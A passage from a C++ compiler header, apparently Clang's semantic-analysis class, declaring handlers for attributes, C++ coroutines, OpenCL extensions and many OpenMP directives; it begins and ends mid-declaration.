/// Only called on function definitions; if there is a pragma in scope
/// with the effect of a range-based optnone, consider marking the function
/// with attribute optnone.
void AddRangeBasedOptnone(FunctionDecl *FD);
/// Adds the 'optnone' attribute to the function declaration if there
/// are no conflicts; Loc represents the location causing the 'optnone'
/// attribute to be added (usually because of a pragma).
void AddOptnoneAttributeIfNoConflicts(FunctionDecl *FD, SourceLocation Loc);
/// AddAlignedAttr - Adds an aligned attribute to a particular declaration.
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
bool IsPackExpansion);
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, TypeSourceInfo *T,
bool IsPackExpansion);
/// AddAssumeAlignedAttr - Adds an assume_aligned attribute to a particular
/// declaration.
void AddAssumeAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
Expr *OE);
/// AddAllocAlignAttr - Adds an alloc_align attribute to a particular
/// declaration.
void AddAllocAlignAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *ParamExpr);
/// AddAlignValueAttr - Adds an align_value attribute to a particular
/// declaration.
void AddAlignValueAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E);
/// AddLaunchBoundsAttr - Adds a launch_bounds attribute to a particular
/// declaration.
void AddLaunchBoundsAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *MaxThreads, Expr *MinBlocks);
/// AddModeAttr - Adds a mode attribute to a particular declaration.
void AddModeAttr(Decl *D, const AttributeCommonInfo &CI, IdentifierInfo *Name,
bool InInstantiation = false);
void AddParameterABIAttr(Decl *D, const AttributeCommonInfo &CI,
ParameterABI ABI);
enum class RetainOwnershipKind {NS, CF, OS};
void AddXConsumedAttr(Decl *D, const AttributeCommonInfo &CI,
RetainOwnershipKind K, bool IsTemplateInstantiation);
/// addAMDGPUFlatWorkGroupSizeAttr - Adds an amdgpu_flat_work_group_size
/// attribute to a particular declaration.
void addAMDGPUFlatWorkGroupSizeAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
/// addAMDGPUWavePersEUAttr - Adds an amdgpu_waves_per_eu attribute to a
/// particular declaration.
void addAMDGPUWavesPerEUAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
bool checkNSReturnsRetainedReturnType(SourceLocation loc, QualType type);
//===--------------------------------------------------------------------===//
// C++ Coroutines TS
//
bool ActOnCoroutineBodyStart(Scope *S, SourceLocation KwLoc,
StringRef Keyword);
ExprResult ActOnCoawaitExpr(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult ActOnCoyieldExpr(Scope *S, SourceLocation KwLoc, Expr *E);
StmtResult ActOnCoreturnStmt(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult BuildResolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
ExprResult BuildUnresolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
UnresolvedLookupExpr* Lookup);
ExprResult BuildCoyieldExpr(SourceLocation KwLoc, Expr *E);
StmtResult BuildCoreturnStmt(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
StmtResult BuildCoroutineBodyStmt(CoroutineBodyStmt::CtorArgs);
bool buildCoroutineParameterMoves(SourceLocation Loc);
VarDecl *buildCoroutinePromise(SourceLocation Loc);
void CheckCompletedCoroutineBody(FunctionDecl *FD, Stmt *&Body);
ClassTemplateDecl *lookupCoroutineTraits(SourceLocation KwLoc,
SourceLocation FuncLoc);
//===--------------------------------------------------------------------===//
// OpenCL extensions.
//
private:
std::string CurrOpenCLExtension;
/// Extensions required by an OpenCL type.
llvm::DenseMap<const Type*, std::set<std::string>> OpenCLTypeExtMap;
/// Extensions required by an OpenCL declaration.
llvm::DenseMap<const Decl*, std::set<std::string>> OpenCLDeclExtMap;
public:
llvm::StringRef getCurrentOpenCLExtension() const {
return CurrOpenCLExtension;
}
/// Check if a function declaration \p FD associates with any
/// extensions present in OpenCLDeclExtMap and if so return the
/// extension(s) name(s).
std::string getOpenCLExtensionsFromDeclExtMap(FunctionDecl *FD);
/// Check if a function type \p FT associates with any
/// extensions present in OpenCLTypeExtMap and if so return the
/// extension(s) name(s).
std::string getOpenCLExtensionsFromTypeExtMap(FunctionType *FT);
/// Find an extension in an appropriate extension map and return its name
template<typename T, typename MapT>
std::string getOpenCLExtensionsFromExtMap(T* FT, MapT &Map);
void setCurrentOpenCLExtension(llvm::StringRef Ext) {
CurrOpenCLExtension = std::string(Ext);
}
/// Set OpenCL extensions for a type which can only be used when these
/// OpenCL extensions are enabled. If \p Exts is empty, do nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForType(QualType T, llvm::StringRef Exts);
/// Set OpenCL extensions for a declaration which can only be
/// used when these OpenCL extensions are enabled. If \p Exts is empty, do
/// nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForDecl(Decl *FD, llvm::StringRef Exts);
/// Set current OpenCL extensions for a type which can only be used
/// when these OpenCL extensions are enabled. If current OpenCL extension is
/// empty, do nothing.
void setCurrentOpenCLExtensionForType(QualType T);
/// Set current OpenCL extensions for a declaration which
/// can only be used when these OpenCL extensions are enabled. If current
/// OpenCL extension is empty, do nothing.
void setCurrentOpenCLExtensionForDecl(Decl *FD);
bool isOpenCLDisabledDecl(Decl *FD);
/// Check if type \p T corresponding to declaration specifier \p DS
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledTypeDeclSpec(const DeclSpec &DS, QualType T);
/// Check if declaration \p D used by expression \p E
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledDecl(const NamedDecl &D, const Expr &E);
//===--------------------------------------------------------------------===//
// OpenMP directives and clauses.
//
private:
void *VarDataSharingAttributesStack;
/// Number of nested '#pragma omp declare target' directives.
unsigned DeclareTargetNestingLevel = 0;
/// Initialization of data-sharing attributes stack.
void InitDataSharingAttributesStack();
void DestroyDataSharingAttributesStack();
ExprResult
VerifyPositiveIntegerConstantInClause(Expr *Op, OpenMPClauseKind CKind,
bool StrictlyPositive = true);
/// Returns OpenMP nesting level for current directive.
unsigned getOpenMPNestingLevel() const;
/// Adjusts the function scopes index for the target-based regions.
void adjustOpenMPTargetScopeIndex(unsigned &FunctionScopesIndex,
unsigned Level) const;
/// Returns the number of scopes associated with the construct on the given
/// OpenMP level.
int getNumberOfConstructScopes(unsigned Level) const;
/// Push new OpenMP function region for non-capturing function.
void pushOpenMPFunctionRegion();
/// Pop OpenMP function region for non-capturing function.
void popOpenMPFunctionRegion(const sema::FunctionScopeInfo *OldFSI);
/// Check if the expression is allowed to be used in expressions for the
/// OpenMP devices.
void checkOpenMPDeviceExpr(const Expr *E);
/// Checks if a type or a declaration is disabled due to the owning extension
/// being disabled, and emits diagnostic messages if it is disabled.
/// \param D type or declaration to be checked.
/// \param DiagLoc source location for the diagnostic message.
/// \param DiagInfo information to be emitted for the diagnostic message.
/// \param SrcRange source range of the declaration.
/// \param Map maps type or declaration to the extensions.
/// \param Selector selects diagnostic message: 0 for type and 1 for
/// declaration.
/// \return true if the type or declaration is disabled.
template <typename T, typename DiagLocT, typename DiagInfoT, typename MapT>
bool checkOpenCLDisabledTypeOrDecl(T D, DiagLocT DiagLoc, DiagInfoT DiagInfo,
MapT &Map, unsigned Selector = 0,
SourceRange SrcRange = SourceRange());
/// Helper to keep information about the current `omp begin/end declare
/// variant` nesting.
struct OMPDeclareVariantScope {
/// The associated OpenMP context selector.
OMPTraitInfo *TI;
/// The associated OpenMP context selector mangling.
std::string NameSuffix;
OMPDeclareVariantScope(OMPTraitInfo &TI);
};
/// The current `omp begin/end declare variant` scopes.
SmallVector<OMPDeclareVariantScope, 4> OMPDeclareVariantScopes;
/// The declarator \p D defines a function in the scope \p S which is nested
/// in an `omp begin/end declare variant` scope. In this method we create a
/// declaration for \p D and rename \p D according to the OpenMP context
/// selector of the surrounding scope.
FunctionDecl *
ActOnStartOfFunctionDefinitionInOpenMPDeclareVariantScope(Scope *S,
Declarator &D);
/// Register \p FD as specialization of \p BaseFD in the current `omp
/// begin/end declare variant` scope.
void ActOnFinishedFunctionDefinitionInOpenMPDeclareVariantScope(
FunctionDecl *FD, FunctionDecl *BaseFD);
public:
/// Can we exit a scope at the moment.
bool isInOpenMPDeclareVariantScope() {
return !OMPDeclareVariantScopes.empty();
}
/// Given the potential call expression \p Call, determine if there is a
/// specialization via the OpenMP declare variant mechanism available. If
/// there is, return the specialized call expression, otherwise return the
/// original \p Call.
ExprResult ActOnOpenMPCall(ExprResult Call, Scope *Scope,
SourceLocation LParenLoc, MultiExprArg ArgExprs,
SourceLocation RParenLoc, Expr *ExecConfig);
/// Handle a `omp begin declare variant`.
void ActOnOpenMPBeginDeclareVariant(SourceLocation Loc, OMPTraitInfo &TI);
/// Handle a `omp end declare variant`.
void ActOnOpenMPEndDeclareVariant();
/// Checks if the variant/multiversion functions are compatible.
bool areMultiversionVariantFunctionsCompatible(
const FunctionDecl *OldFD, const FunctionDecl *NewFD,
const PartialDiagnostic &NoProtoDiagID,
const PartialDiagnosticAt &NoteCausedDiagIDAt,
const PartialDiagnosticAt &NoSupportDiagIDAt,
const PartialDiagnosticAt &DiffDiagIDAt, bool TemplatesSupported,
bool ConstexprSupported, bool CLinkageMayDiffer);
/// Function tries to capture lambda's captured variables in the OpenMP region
/// before the original lambda is captured.
void tryCaptureOpenMPLambdas(ValueDecl *V);
/// Return true if the provided declaration \a VD should be captured by
/// reference.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
/// \param OpenMPCaptureLevel Capture level within an OpenMP construct.
bool isOpenMPCapturedByRef(const ValueDecl *D, unsigned Level,
unsigned OpenMPCaptureLevel) const;
/// Check if the specified variable is used in one of the private
/// clauses (private, firstprivate, lastprivate, reduction etc.) in OpenMP
/// constructs.
VarDecl *isOpenMPCapturedDecl(ValueDecl *D, bool CheckScopeInfo = false,
unsigned StopAt = 0);
ExprResult getOpenMPCapturedExpr(VarDecl *Capture, ExprValueKind VK,
ExprObjectKind OK, SourceLocation Loc);
/// If the current region is a loop-based region, mark the start of the loop
/// construct.
void startOpenMPLoop();
/// If the current region is a range loop-based region, mark the start of the
/// loop construct.
void startOpenMPCXXRangeFor();
/// Check if the specified variable is used in 'private' clause.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
OpenMPClauseKind isOpenMPPrivateDecl(ValueDecl *D, unsigned Level,
unsigned CapLevel) const;
/// Sets OpenMP capture kind (OMPC_private, OMPC_firstprivate, OMPC_map etc.)
/// for \p FD based on DSA for the provided corresponding captured declaration
/// \p D.
void setOpenMPCaptureKind(FieldDecl *FD, const ValueDecl *D, unsigned Level);
/// Check if the specified variable is captured by 'target' directive.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
bool isOpenMPTargetCapturedDecl(const ValueDecl *D, unsigned Level,
unsigned CaptureLevel) const;
/// Check if the specified global variable must be captured by outer capture
/// regions.
/// \param Level Relative level of nested OpenMP construct for that
/// the check is performed.
bool isOpenMPGlobalCapturedDecl(ValueDecl *D, unsigned Level,
unsigned CaptureLevel) const;
ExprResult PerformOpenMPImplicitIntegerConversion(SourceLocation OpLoc,
Expr *Op);
/// Called on start of new data sharing attribute block.
void StartOpenMPDSABlock(OpenMPDirectiveKind K,
const DeclarationNameInfo &DirName, Scope *CurScope,
SourceLocation Loc);
/// Start analysis of clauses.
void StartOpenMPClause(OpenMPClauseKind K);
/// End analysis of clauses.
void EndOpenMPClause();
/// Called on end of data sharing attribute block.
void EndOpenMPDSABlock(Stmt *CurDirective);
/// Check if the current region is an OpenMP loop region and if it is,
/// mark loop control variable, used in \p Init for loop initialization, as
/// private by default.
/// \param Init First part of the for loop.
void ActOnOpenMPLoopInitialization(SourceLocation ForLoc, Stmt *Init);
// OpenMP directives and clauses.
/// Called on correct id-expression from the '#pragma omp
/// threadprivate'.
ExprResult ActOnOpenMPIdExpression(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
OpenMPDirectiveKind Kind);
/// Called on well-formed '#pragma omp threadprivate'.
DeclGroupPtrTy ActOnOpenMPThreadprivateDirective(
SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Builds a new OpenMPThreadPrivateDecl and checks its correctness.
OMPThreadPrivateDecl *CheckOMPThreadPrivateDecl(SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Called on well-formed '#pragma omp allocate'.
DeclGroupPtrTy ActOnOpenMPAllocateDirective(SourceLocation Loc,
ArrayRef<Expr *> VarList,
ArrayRef<OMPClause *> Clauses,
DeclContext *Owner = nullptr);
/// Called on well-formed '#pragma omp requires'.
DeclGroupPtrTy ActOnOpenMPRequiresDirective(SourceLocation Loc,
ArrayRef<OMPClause *> ClauseList);
/// Check restrictions on Requires directive
OMPRequiresDecl *CheckOMPRequiresDecl(SourceLocation Loc,
ArrayRef<OMPClause *> Clauses);
/// Check if the specified type is allowed to be used in 'omp declare
/// reduction' construct.
QualType ActOnOpenMPDeclareReductionType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name,
ArrayRef<std::pair<QualType, SourceLocation>> ReductionTypes,
AccessSpecifier AS, Decl *PrevDeclInScope = nullptr);
/// Initialize declare reduction construct initializer.
void ActOnOpenMPDeclareReductionCombinerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionCombinerEnd(Decl *D, Expr *Combiner);
/// Initialize declare reduction construct initializer.
/// \return omp_priv variable.
VarDecl *ActOnOpenMPDeclareReductionInitializerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionInitializerEnd(Decl *D, Expr *Initializer,
VarDecl *OmpPrivParm);
/// Called at the end of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveEnd(
Scope *S, DeclGroupPtrTy DeclReductions, bool IsValid);
/// Check variable declaration in 'omp declare mapper' construct.
TypeResult ActOnOpenMPDeclareMapperVarDecl(Scope *S, Declarator &D);
/// Check if the specified type is allowed to be used in 'omp declare
/// mapper' construct.
QualType ActOnOpenMPDeclareMapperType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare mapper'.
OMPDeclareMapperDecl *ActOnOpenMPDeclareMapperDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name, QualType MapperType,
SourceLocation StartLoc, DeclarationName VN, AccessSpecifier AS,
Decl *PrevDeclInScope = nullptr);
/// Build the mapper variable of '#pragma omp declare mapper'.
void ActOnOpenMPDeclareMapperDirectiveVarDecl(OMPDeclareMapperDecl *DMD,
Scope *S, QualType MapperType,
SourceLocation StartLoc,
DeclarationName VN);
/// Called at the end of '#pragma omp declare mapper'.
DeclGroupPtrTy
ActOnOpenMPDeclareMapperDirectiveEnd(OMPDeclareMapperDecl *D, Scope *S,
ArrayRef<OMPClause *> ClauseList);
/// Called on the start of target region i.e. '#pragma omp declare target'.
bool ActOnStartOpenMPDeclareTargetDirective(SourceLocation Loc);
/// Called at the end of target region i.e. '#pragme omp end declare target'.
void ActOnFinishOpenMPDeclareTargetDirective();
/// Searches for the provided declaration name for OpenMP declare target
/// directive.
NamedDecl *
lookupOpenMPDeclareTargetName(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
NamedDeclSetType &SameDirectiveDecls);
/// Called on correct id-expression from the '#pragma omp declare target'.
void ActOnOpenMPDeclareTargetName(NamedDecl *ND, SourceLocation Loc,
OMPDeclareTargetDeclAttr::MapTypeTy MT,
OMPDeclareTargetDeclAttr::DevTypeTy DT);
/// Check declaration inside target region.
void
checkDeclIsAllowedInOpenMPTarget(Expr *E, Decl *D,
SourceLocation IdLoc = SourceLocation());
/// Finishes analysis of the deferred functions calls that may be declared as
/// host/nohost during device/host compilation.
void finalizeOpenMPDelayedAnalysis(const FunctionDecl *Caller,
const FunctionDecl *Callee,
SourceLocation Loc);
/// Return true inside OpenMP declare target region.
bool isInOpenMPDeclareTargetContext() const {
return DeclareTargetNestingLevel > 0;
}
/// Return true inside OpenMP target region.
bool isInOpenMPTargetExecutionDirective() const;
/// Return the number of captured regions created for an OpenMP directive.
static int getOpenMPCaptureLevels(OpenMPDirectiveKind Kind);
/// Initialization of captured region for OpenMP region.
void ActOnOpenMPRegionStart(OpenMPDirectiveKind DKind, Scope *CurScope);
/// End of OpenMP region.
///
/// \param S Statement associated with the current OpenMP region.
/// \param Clauses List of clauses for the current OpenMP region.
///
/// \returns Statement for finished OpenMP region.
StmtResult ActOnOpenMPRegionEnd(StmtResult S, ArrayRef<OMPClause *> Clauses);
StmtResult ActOnOpenMPExecutableDirective(
OpenMPDirectiveKind Kind, const DeclarationNameInfo &DirName,
OpenMPDirectiveKind CancelRegion, ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc, SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
using VarsWithInheritedDSAType =
llvm::SmallDenseMap<const ValueDecl *, const Expr *, 4>;
/// Called on well-formed '\#pragma omp simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp sections' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp section' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSectionDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp single' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSingleDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp master' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp critical' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPCriticalDirective(const DeclarationNameInfo &DirName,
ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel for' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel sections' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp task' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTaskDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskyield'.
StmtResult ActOnOpenMPTaskyieldDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp barrier'.
StmtResult ActOnOpenMPBarrierDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskwait'.
StmtResult ActOnOpenMPTaskwaitDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskgroup'.
StmtResult ActOnOpenMPTaskgroupDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp flush'.
StmtResult ActOnOpenMPFlushDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp depobj'.
StmtResult ActOnOpenMPDepobjDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp scan'.
StmtResult ActOnOpenMPScanDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp ordered' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPOrderedDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp atomic' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPAtomicDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target data' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTargetDataDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target enter data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetEnterDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target exit data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetExitDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target parallel' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp cancellation point'.
StmtResult
ActOnOpenMPCancellationPointDirective(SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp cancel'.
StmtResult ActOnOpenMPCancelDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp taskloop' after parsing of the
/// associated statement.
StmtResult
ActOnOpenMPTaskLoopDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPDistributeDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target update'.
StmtResult ActOnOpenMPTargetUpdateDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp distribute parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target simd' after parsing of
/// the associated statement.
StmtResult
ActOnOpenMPTargetSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute simd' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target teams distribute' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeDirective(
